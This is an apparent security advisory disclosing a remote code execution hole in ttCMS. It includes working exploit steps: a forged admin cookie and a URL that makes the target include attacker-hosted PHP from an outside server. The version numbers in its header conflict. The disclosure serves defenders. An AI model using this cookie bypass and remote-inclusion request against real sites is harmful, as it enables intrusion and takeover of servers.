Advisory name: Remote code execution in ttCMS 2.2.0/2.2.1
Application: ttCMS v2.3 (and older versions)
Vendor: www.ttcms.com
Status: Vendor was contacted but didn't reply - after posting about another
hole on his forums, my account was banned
Impact: Attacker can execute arbitrary php code 
Platform(s): Unix 

Technical description:
----------------------

Everybody can inject PHP code in ttCMS through the file "header.php"
which can be found in the directory admin/templates/

header.php:
------------------------------------------
(Line #002) if ($HTTP_COOKIE_VARS["ttcms_user_admin"] > 0) {
(Line #003)  include_once("$admin_root/templates/header.inc.php");
(Line #004) } else {
(Line #005)  header("Location: $admin_root_url/login.php");
(Line #006)  exit;
(Line #007) }
------------------------------------------

all you have to do is to send a fake cookie containing

------------------------------------------
ttcms_user_admin=1
------------------------------------------

(this can easily be done by using a tool like Proxomitron or
Anonymity4Proxy)

In order to exploit this vulnerability, you have to create a 
file "templates/header.inc.php" on your own webserver,
which contains the  code you want to execute on the target-system.

If you now call the file "header.php" like this:

------------------------------------------
http://target/admin/templates/header.php?admin_root=http://yourserver/
------------------------------------------

the code in "templates/header.inc.php" on your own webserver will be 
injected. (of course, PHP Execution must be disabled on your machine or
you must use a ftp-Server to store the file you want to inject)

Recommendations:
----------------
Run ttCMS on a secure environment.
Disable register_globals in php.ini
Update to a newer version of ttCMS (currently, none exists)

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!